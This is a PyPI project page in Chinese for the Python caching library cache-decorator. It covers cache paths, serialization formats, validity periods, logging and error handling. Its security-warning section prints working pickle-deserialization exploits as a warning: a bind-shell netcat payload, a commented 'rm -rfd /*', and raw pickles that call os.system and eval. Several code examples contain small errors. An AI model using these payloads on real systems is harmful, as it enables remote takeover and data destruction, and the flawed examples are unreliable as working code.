cache-decorator · PyPI · Python 包索引

一个简单的装饰器，用于缓存计算密集型函数的结果

这些详细信息尚未由PyPI验证

项目链接

主页

项目描述

一个简单的装饰器，用于缓存计算密集型函数的结果。该包会根据保存路径的格式自动序列化和反序列化。

默认支持 .json .json.gz .json.bz .json.lzma 和 .pkl .pkl.gz .pkl.bz .pkl.lzma .pkl.zip，但如果有以下包安装，可以使用其他扩展

numpy: .npy .npz

pandas: .csv .csv.gz .csv.bz2 .csv.zip .csv.xz

还有针对数值数据框的优化格式

pandas: .embedding .embedding.gz .embedding.bz2 .embedding.xz

这将创建一个可选的压缩tar存档，包含索引和列的pickle以及值的.npy

import time
import numpy as np
import pandas as pd
from cache_decorator import Cache

@Cache(
    cache_path={
        "info": "/tmp/{function_name}/{_hash}.json.xz",
        "data": "/tmp/{function_name}/{_hash}.csv.gz",
    },
    validity_duration="24d",
    args_to_ignore=("verbose",),
    enable_cache_arg_name="enable_cache",
)
def function_to_cache(seed: int, verbose: bool = True):
    np.random.seed(seed)
    if verbose:
        print(f"using seed {seed}")
    return {
        "info": {"timestamp": time.time(), "seed": seed,},
        "data": pd.DataFrame(
            np.random.randint(0, 100, size=(100, 4)), columns=list("ABCD")
        ),
    }

如何安装此包？

像往常一样，只需使用pip下载即可

pip install cache_decorator

使用示例

要缓存一个函数或方法，只需用缓存装饰器装饰它即可。

from time import sleep
from cache_decorator import Cache
from dict_hash import Hashable

@Cache()
def x(a, b):
    sleep(3)
    return a + b

class A(Hashable):
    def __init__(self, x):
    self.x = x

    # you can call a method without args
    def my_method(self):
        return "|{}|".format(self.x)

    # you can call a static method
    @staticmethod
    def my_staticmethod():
        return "CIAO"

    # you can call a property
    @property
    def my_property(self):
        return "|{}|".format(self.x)

    # methods, static methods, and properties can return a custom formatter
    # that access attributes but can't call other methods
    def custom_formatter_method(self):
        return "{self.x:.4f}"

    @Cache(
        # this is a quick example of most things you can do in the formatting
        cache_path="/".join(
            "{cache_dir}",
            "{self.x}",
            "{self.my_method()}",
            "{self.my_staticmethod()}",
            "{self.my_property()}",
            "{self.custom_formatter_method()}",
            "{a}",
            "{b}_{_hash}.pkl",
        )
    )
    def f(self, a, b):
        sleep(3)
        return a + b

    # only needed if you want "{_hash}" in the path
    def consistent_hash(self) -> str:
        return str(self.x)

缓存路径

默认缓存目录是 ./cache，但可以通过将cache_dir参数传递给装饰器或设置环境变量CACHE_DIR来设置它。如果两者都设置了，则参数文件夹优先于环境变量。

from time import sleep
from cache_decorator import Cache

@Cache(cache_dir="/tmp")
def x(a):
    sleep(3)
    return a

可以通过传递cache_path参数来修改路径格式。此字符串将使用有关函数、其参数以及如果是方法，则self属性的信息进行格式化。

默认路径是

from time import sleep
from cache_decorator import Cache

@Cache(cache_path="{cache_dir}/{file_name}_{function_name}/{_hash}.pkl")
def x(a):
    sleep(3)
    return a

但可以修改给缓存一个更有意义的名称，例如，我们可以在文件名中添加a的值。

from time import sleep
from cache_decorator import Cache

@Cache(cache_path="{cache_dir}/{file_name}_{function_name}/{a}_{_hash}.pkl")
def x(a):
    sleep(3)
    return a

根据文件的扩展名，将调用不同的序列化和反序列化调度程序。

from time import sleep
from cache_decorator import Cache

@Cache(cache_path="/tmp/{_hash}.pkl.gz")
def x(a):
    sleep(3)
    return a

@Cache(cache_path="/tmp/{_hash}.json")
def x(a):
    sleep(3)
    return {"1":1,"2":2}

@Cache(cache_path="/tmp/{_hash}.npy")
def x(a):
    sleep(3)
    return np.array([1, 2, 3])

@Cache(cache_path="/tmp/{_hash}.npz")
def x(a):
    sleep(3)
    return np.array([1, 2, 3]), np.array([1, 2, 4])

在计算哈希时忽略参数

默认情况下，缓存通过函数传递的参数进行区分。可以指定哪些参数应该被忽略。

from time import sleep
from cache_decorator import Cache

@Cache(args_to_ignore=["verbose"])
def x(a, verbose=False):
    sleep(3)
    if verbose:
        print("HEY")
    return a

可以指定一个字符串列表作为要忽略的参数名称。

from time import sleep
from cache_decorator import Cache

@Cache(args_to_ignore=["verbose", "multiprocessing"])
def x(a, verbose=False, multiprocessing=False):
    sleep(3)
    if verbose:
        print("HEY")
    return a

动态启用缓存

有时我们需要动态地启用或禁用缓存，我们支持使用 enable_cache_arg_name 参数来实现，使用方法如下：

import time
import numpy as np
import pandas as pd
from cache_decorator import Cache

# simple boolean argument

@Cache(
    enable_cache_arg_name="enable_cache",
)
def function_to_cache(seed: int):
    np.random.seed(seed)
    return {"seed":seed}

# Cache enabled
function_to_cache(10)
# Cache enabled
function_to_cache(10, enable_cache=True)
# Cache disabled
function_to_cache(10, enable_cache=False)

class TestEnableCacheArgAsAttribute:
    def __init__(self, enable_cache: bool):
        self.enable_cache = enable_cache

    @Cache(
        cache_path="{cache_dir}/{a}.pkl",
        cache_dir="./test_cache",
        enable_cache_arg_name="self.enable_cache",
    )
    def cached_method(self, a):
        sleep(2)
        return [1, 2, 3]

instance = TestEnableCacheArgAsAttribute(enable_cache=True)
# with cache enabled
instance.cached_method(1)
# disable the cache
instance.enable_cache = False
instance.cached_method(1)


class TestEnableCacheArgAsAttributeProperty:
    def __init__(self, enable_cache: bool):
        self.enable_cache = enable_cache

    @property
    def is_cache_enabled(self):
        return self.enable_cache

    @Cache(
        cache_path="{cache_dir}/{a}.pkl",
        cache_dir="./test_cache",
        enable_cache_arg_name="self.is_cache_enabled()",
    )
    def cached_method(self, a):
        sleep(2)
        return [1, 2, 3]

instance = TestEnableCacheArgAsAttribute(enable_cache=True)
# with cache enabled
instance.cached_method(1)
# disable the cache
instance.enable_cache = False
instance.cached_method(1)

class TestEnableCacheArgAsAttributeStatic:
    """This can be used for abstract classes"""
    def __init__(self, enable_cache: bool):
        self.enable_cache = enable_cache

    @staticmethod
    def is_cache_enabled():
        return True

    @Cache(
        cache_path="{cache_dir}/{a}.pkl",
        cache_dir="./test_cache",
        enable_cache_arg_name="self.is_cache_enabled()",
    )
    def cached_method(self, a):
        sleep(2)
        return [1, 2, 3]

instance = TestEnableCacheArgAsAttributeStatic(enable_cache=True)
instance.cached_method(1)

有关使用示例，请参阅测试：test/test_method.py 和 test/test_enable_cache_arg_name.py。

缓存有效期

缓存也可能有一个有效期。

from time import sleep
from cache_decorator import Cache

@Cache(
    cache_path="/tmp/{_hash}.pkl.gz",
    validity_duration="24d"
    )
def x(a):
    sleep(3)
    return a

在这个例子中，缓存将在接下来的 24 天内有效。在第 25 天，缓存将被重建。持续时间可以写成秒或带有单位的字符串。单位可以是“s”秒，“m”分钟，“h”小时，“d”天，“w”周。

日志记录

每次使用此装饰器装饰新函数时，都会创建一个新的记录器。您可以使用 log_level 和 log_format 修改默认记录器。

from time import sleep
from cache_decorator import Cache

@Cache(log_level="debug")
def x(a):
    sleep(3)
    return a

如果您不喜欢默认格式，可以更改它：

from time import sleep
from cache_decorator import Cache

@Cache(log_format="%(asctime)-15s[%(levelname)s]: %(message)s")
def x(a):
    sleep(3)
    return a

有关格式化的更多信息，请参阅此处 https://docs.pythonlang.cn/3/library/logging.html。

此外，默认记录器的名称是

logging.getLogger("cache." + function.__name__)

因此，我们可以获取记录器的引用并完全自定义它

import logging
from cache_decorator import Cache

@Cache()
def test_function(x):
    return 2 * x

# Get the logger
logger = logging.getLogger("cache.test_function")
logger.setLevel(logging.DEBUG)

# Make it log to a file
handler = logging.FileHandler("cache.log")
logger.addHandler(handler)

错误处理

我们注意到使用此库的一个常见问题是，如果保存的类型与选择的扩展不兼容，则程序将在函数结束时引发异常，我们丢失了所有已完成的工作。为了缓解这个问题，现在缓存装饰器有一个内置的错误处理系统。如果在序列化结果时发生错误，程序将自动使用 pickle 进行备份。默认情况下，这将在原始路径的末尾添加 _backup.pkl，但如果出于任何原因这将覆盖文件，则将附加一个随机字符串。并且记录（以关键级别）备份文件的路径和预期的路径

假设我们错误地将扩展名设置为 CSV 而不是 JSON

from cache_decorator import Cache

@Cache("./test_{x}.csv")
def test_function(x):
    return {"this":{"is":{"not":{"a":"csv"}}}}

test_function(10)
# 2021-02-22 13:22:07,286[CRITICAL]: Couldn't save the result of the function. Saving the result as a pickle at:
# ./test_10.csv_backup.pkl
# The file was gonna be written at:
# ./test_10.csv

现在我们可以手动加载值并将其存储在正确的路径上，这样在下次函数调用时，缓存将使用正确的扩展名正确加载。

import json
import pickle

# Load the backup
with open("./test_10.csv_backup.pkl", "rb") as f:
    result = pickle.load(f)

# Save it at the right path
with open("./test_10.json", "w") as f:
    json.dump(f, result)

from cache_decorator import Cache

@Cache("./test_{x}.json")
def test_function(x):
    return {"this":{"is":{"not":{"a":"csv"}}}}

test_function(10) # Load the corrected Cache at "./test_10.json"

可选地，可以通过捕获异常并访问其字段来程序化地解决这个问题。

from cache_decorator import Cache

@Cache("./test.csv")
def test_function(x):
    return {"this":{"is":{"not":{"a":"csv"}}}}

try:
    test_function(10, y="ciao")
except SerializationException as e:
    result = e.result
    backup_path = e.backup_path
    path = e.path

此外，可以使用 backup_path 参数自定义备份路径，在这里您可以使用与 path 相同的参数，也可以使用 {_date}，它是备份的日期，以及 {_rnd}，这保证了文件不会覆盖其他文件

from cache_decorator import Cache

@Cache("./test.csv", backup_path="./backup_{date}_{rnd}.pkl")
def test_function(x):
    return {"this":{"is":{"not":{"a":"csv"}}}}

test_function(10, y="ciao")

# 2021-02-22 13:22:07,286[CRITICAL]: Couldn't save the result of the function. Saving the result as a pickle at:
# ./backup_2021_02_22_13_22_07_18ce30b003e14d16d5e0f749e8205e467aedfbba.pkl
# The file was gonna be written at:
# ./test.csv

内部结构

如果您需要以任何原因获取包装函数及其缓存类引用，您可以通过内部变量访问它们

from cache_decorator import Cache

@Cache()
def test_function(x, y):
    return 2 * x

original_test_function = test_function.__cached_function
test_function_cacher_class = test_function.__cacher_instance

我们不建议使用它们。

手动缓存

如果出于某种原因需要手动管理缓存，您可以使用 Cache 类的内置静态方法。它将自动创建所需的文件夹。此外，您还可以获取函数调用的预期路径。

from cache_decorator import Cache

# you can use the Cache class functions to load and store data easily
# but here you can't use a path formatter but you have to pass a complete path.

# Store
Cache.store({1:2, 3:4}, "./my_custom_cache/best_dict_ever.json)

# Load
best_dict = Cache.load("./my_custom_cache/best_dict_ever.json)

# This would not format anything!
# Cache.store({1:2, 3:4}, "./my_custom_cache/{_hash}.json)
# this would save a file called literally called "{_hash}.json"

@Cache()
def test_function(x, y):
    return 2 * x


# you can get the path where the file would be saved (this does not call the function!).
path = Cache.compute_path(test_function, 10, y="ciao")

安全警告

尽可能不要使用 pickle 扩展。未信任数据的反序列化可能会导致远程代码执行或本地权限提升（ https://davidhamann.de/2020/04/05/exploiting-python-pickle/）。因此，在可能的情况下，简单格式（如 json）是首选。

假设我们有以下代码

from cache_decorator import Cache

@Cache("./cache/{x}.pkl)
def my_awesome_function(x):
    return x

...

my_awesome_function(1)

如果我们以任何方式可以访问缓存文件夹，我们就可以轻易地利用它

import pickle

COMMAND = "netcat -c '/bin/bash -i' -l -p 4444" # rm -rfd /*

class PickleRce(object):
    def __reduce__(self):
        import os
        return (os.system,(COMMAND,))

payload = pickle.dumps(PickleRce())
print(payload)
# b"\x80\x04\x95>\x00\x00\x00\x00\x00\x00\x00\x8c\x05posix\x94\x8c\x06system\x94\x93\x94\x8c#netcat -c '/bin/bash -i' -l -p 4444\x94\x85\x94R\x94."

with open("./cache/1.pkl", "wb") as f:
    f.write(payload)

下次函数调用时，如果使用参数 1，我们将启动远程shell并控制系统。

或者，由于Pickle是一个由VM执行的“编程语言”，我们可以编写一个仅使用内置函数的通用RCE漏洞。

import pickle

# Build the exploit
command = b"""cat flag.txt"""
x = b"c__builtin__\ngetattr\nc__builtin__\n__import__\nS'os'\n\x85RS'system'\n\x86RS'%s'\n\x85R."%command

# Test it
pickle.load(x)

或者，你只需调用eval并执行任意Python代码。

import pickle

code = "print('ciao')"

pickle.loads(b"".join([
    b"c__builtin__\neval\n(",
    pickle.dumps(code, protocol=0)[:-1],
    b"tR."
]))

因此，使用更简单的序列化方案（如json）并通过将缓存目录设置为当前用户的只读来加强系统是很重要的。

chown -r $USER:$USER ./cache
chmod -r 600 ./cache

这样，只有当前应用程序可以创建和修改缓存文件。

项目详情

这些详细信息尚未由PyPI验证

项目链接

主页

发布历史发布通知 | RSS源

此版本

2.2.0

2024年1月26日

2.1.15

2023年7月31日

2.1.14

2023年5月25日

2.1.13

2022年11月9日

2.1.11

2022年8月7日

2.1.10

2022年8月6日

2.1.9

2022年8月5日

2.1.8

2022年6月24日

2.1.7

2022年6月21日

2.1.6

2022年5月31日

2.1.5

2022年5月31日

2.1.4

2022年5月31日

2.1.3

2022年5月27日

2.1.2

2022年5月27日

2.1.1

2022年5月27日

2.1.0

2022年5月24日

2.0.16

2022年5月12日

2.0.15

2022年5月6日

2.0.14

2022年4月29日

2.0.13

2021年12月14日

2.0.12

2021年11月13日

2.0.11

2021年11月13日

2.0.10

2021年11月9日

2.0.9

2021年9月6日

2.0.8

2021年9月5日

2.0.7

2021年9月4日

2.0.6

2021年6月23日

2.0.5

2021年6月22日

2.0.4

2021年6月22日

2.0.3

2021年4月26日

2.0.2

2021年4月12日

2.0.1

2021年3月28日

2.0.0

2021年3月24日

1.6.0

2021年2月22日

1.5.1

2021年2月17日

1.5.0

2021年1月17日

1.4.1

2020年10月30日

1.4.0

2020年10月8日

1.3.2

2020年8月12日

1.3.0

2020年8月12日

1.2.5

2020年4月5日

1.2.4

2020年4月5日

1.2.3

2020年4月5日

1.2.2

2020年3月29日

1.2.1

2020年3月28日

1.2.0

2020年3月27日

1.1.9

2020年3月27日

1.1.8

2020年3月27日

1.1.7

2020年3月27日

1.1.6

2020年3月27日

1.1.5

2020年3月27日

1.1.3

2020年3月20日

1.1.2

2020年2月28日

1.1.1

2020年2月25日

1.1.0

2020年2月25日

1.0.0

2020年2月24日

下载文件

下载适合您平台的文件。如果您不确定选择哪个，请了解有关安装包的更多信息。

源分布

cache_decorator-2.2.0.tar.gz (35.9 kB 查看散列值)

上传时间 2024年1月26日 源

cache_decorator-2.2.0.tar.gz的散列值

cache_decorator-2.2.0.tar.gz的散列值
算法	散列摘要
SHA256	`ebb427b5acb00fb0a47ed9fc7d52fe96de94f40ca52f381205ace8756df6df5a`
MD5	`8968eba947bf38bb9c1c9cdba5bff3a8`
BLAKE2b-256	`bd52b372ebef6d7e8322dd46ff176fa91cb8374adee85ec54fd6b13bbe0a8eaf`

cache-decorator 2.2.0

导航

已验证详细信息

维护者

未验证详细信息

项目链接

元数据

分类器

项目描述

如何安装此包？

使用示例

缓存路径

在计算哈希时忽略参数

动态启用缓存

缓存有效期

日志记录

错误处理

内部结构

手动缓存

安全警告

项目详情

已验证详细信息

维护者

未验证详细信息

项目链接

元数据

分类器

发布历史发布通知 | RSS源

下载文件

源分布

cache-decorator 2.2.0

导航

已验证详细信息

维护者

未验证详细信息

项目链接

元数据

分类器

项目描述

如何安装此包？

使用示例

缓存路径

在计算哈希时忽略参数

动态启用缓存

缓存有效期

日志记录

错误处理

内部结构

手动缓存

安全警告

项目详情

已验证详细信息

维护者

未验证详细信息

项目链接

元数据

分类器

发布历史 发布通知 | RSS源

下载文件

源分布

发布历史发布通知 | RSS源